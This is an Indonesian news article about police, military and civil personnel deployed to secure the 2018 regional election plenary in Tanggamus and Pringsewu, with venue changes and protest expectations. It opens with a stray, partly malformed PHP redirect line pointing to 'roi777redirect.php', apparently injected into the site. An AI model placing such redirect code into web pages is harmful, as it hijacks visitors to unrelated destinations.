header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pleno Terbuka, Polri Terjunkan 531 Personel -
Pleno Terbuka, Polri Terjunkan 531 Personel

TRANSLAMPUNG.COM, TANGGAMUS – Hari ini (5/7), Komisi Pemilihan Umum Tanggamus akan melaksanakan Pleno Terbuka Tingkat Kabupaten Pilkada Serentak Tahun 2018 di Tanggamus dan Pringsewu. Rapat persiapan pengamanan pleno terbuka yang diikuti lintas sektoral, dilaksanakan di Aula Wira Satya Polres Tanggamus, Rabu (4/7). Alhasil pleno terbuka hari ini dilaksanakan di aula Mapolres Tanggamus.

Kabag Operasional Polres Tanggamus Kompol Aditya Kurniawan dalam penjelasannya menyebutkan, hasil koordinasi Rapat Pleno Pilgub dan Pilbub Tanggamus yang semula direncanakan dilaksanakan di Hotel Gisting, dialihkan di aula Mapolres Polres Tanggamus.

”Itu dengan berbagai pertimbangan dari aspek keamanan serta jarak pergeseran personel,” ujar kabag ops, mewakili Kapolres Tanggamus AKBP I Made Rasma.

Berikutnya, Aditya menjelaskan, penempatan personel pengamanan dibagi Rabu sore, pada saat Apel Kesiapan Pengamanan di Mapolres Tanggamus dan Mapolsek Pringsewu. Dengan kekuatan untuk di Kabupaten Tanggamus, personel Polri 431 orang, TNI 2 pleton personel terdiri dari 1 pleton bersenjata dan 1 pleton non senjata, personel Polisi Pamong Praja sebanyak 100 orang, dan personel Dinas Perhubungan Tanggamus 20 orang.

”Untuk Kabupaten Pringsewu, dari Polri 100 orang, dari TNI 1 pleton, dari Satuan Polisi Pamong Praja 100 orang, dan dari Dishub Pringsewu 20 orang. Pembagian personel, didasari pertimbangan tentang tingkat kerawanan. Yaitu di Kantor KPU, Panwaslu, DPRD, Gudang Logistik, Komplek Pemda, dan titik titik kerawanan lainnya di Tanggamus dan Pringsewu,” papar Aditya Kurniawan.

Terkait tempat pelaksanaan pleno, Kapolres Tanggamus AKBP I Made Rasma menjelaskan, dengan pertimbangan aspek jarak tempuh dan pengamanan logistik serta personel, lebih baik dilaksanakan di aula Mapolres Tanggamus. Pergeseran personil dari Hotel 21 ke mapolres, dikoordinasikan lintas sektoral. Untuk kendaraan, kapolres menyanggupi akan menyiapkannya beserta personil pengamanan yang melekat.

”Terkait pengamanan person dan logistik, akan kami berikan jaminan agar pelaksanaan pleno dapat berjalan lancar hingga selesai dan sampai pelantikan. Untuk undangan para saksi agar dipastikan lagi bahwa yang bersangkutan betul-betul sudah menerima undangan, untuk mengantisipasi adanya gejolak,” ungkap kapolres.

Dia juga meminta, personel yang terlibat dalam pengamanan segera melaporkan jumlahnya. Dengan harapan, Rabu sore pukul 16.00 WIB bisa dilaksanakan Apel Kesiapan Pengamanan di Mapolres Tanggamus dan Mapolsek Pringsewu.

”Saya haruskan masing-masing personel pengamanan, sudah tahu dan paham tugas dan tanggung jawabnya. Hotel 21 Gisting, Hotel VIP, dan Hotel Hosana disiapkan pengamanan bagi peserta Pleno yang menginap di sana,” tegas kapolres.

Komandan Kodim 0424/Tanggamus Letkol (Arh) Anang Husto utomo menyampaikan, agar masing-masing instansi terkait, melaporkan kekuatan personel. Tujuannya untuk mempermudah ploating. Lalu di tiap-tiap bagian, ditunjuk personel tertua dan mencantumkan nomor ponsel supaya mudah dalam pengendalian operasional personel.

”Pleno di Mapolres Tanggamus berkaitan dengan pelayanan masyarakat, harus tetap berjalan. Disarankan agar pintu keluar dan masuk dibagi dua. Satu pintu untuk peserta pleno dan satu pintu untuk pelayanan masyarakat dengan diberikan pembatas, agar pelayanan masyarakat tetap berjalan dan peserta pleno tidak tergangu (tetap aman),” usul dari dandim seraya mengingatkan pintu lolos (escape) juga harus disiapkan.

Berikutnya kata Anang, blokade dua jalur di depan mapolres harus benar-benar clear. Agar tidak ada kendaran yang parkir. Hal itu untuk mengantisipasi situasi teburuk, apabila terjadi kerusuhan demonstran, sehingga dapat mengurangi kerugian material.

”Apel Kesiapan Personel Pengamanan Rabu sore pada pukul 16.00 WIB di Mapolres Tanggamus dan Mapolsek Pringsewu, kami harapkan minimal tertua personel di tiap-tiap bagian hadir, agar jelas dalam pembagian tugas dan tanggung jawabnya,” ungkap dandim.

Kasat Intelkam Polres Tanggamus Iptu. Andi  Yunara menyampaikan informasi kemungkinan adanya unjuk rasa di wilayah Pringsewu. Rutenya dari Kantor PDI-P Pringsewu menuju Kantor Panwaskab setempat. Massa kabarnya akan menyerahkan petisi ke panwaskab.

”Untuk di Tanggamus, kami upayakan tidak ada penyampaian petisi (seperti di Pringsewu). Namun apa pun situasinya, unjuk rasa masih berkembang. Kemungkinan besok (hari ini, Red) bisa dijadikan momen demo. Itu yang perlu diantisipasi,” jelas Andi Yunara.

Rapat persiapan pengamanan dan pelaksanakan Pleno Terbuka Pilkada Serentak 2018 Tanggamus dan Pringsewu, juga dihadiri Ketua KPU Tanggamus Otto Yuri Saputra beserta Hayesta F. Imanda (Komisioner KPU), Antonius Cahayalana (Komisioner KPU), perwakilan Kesbangpol Tanggamus Risna, Anggota Panwaskab Tanggamus Ali Ngafan, Kepala Kesbangpol Kabupaten Prengsewu Drs. Sukarman, Ketua KPU Pringsewu Andreas Handoyo, Ketua Panwaskab Pringsewu M. Fathul Arifin, perwakilan Dishub Pringsewu Abu Husen, perwakilan Sat Pol PP Tanggamus Purwanto, Sekretaris Dishub Tanggamus Suroyo, beserta jajaran Kapolsek se-Tanggamus. (ayp)

News Reporter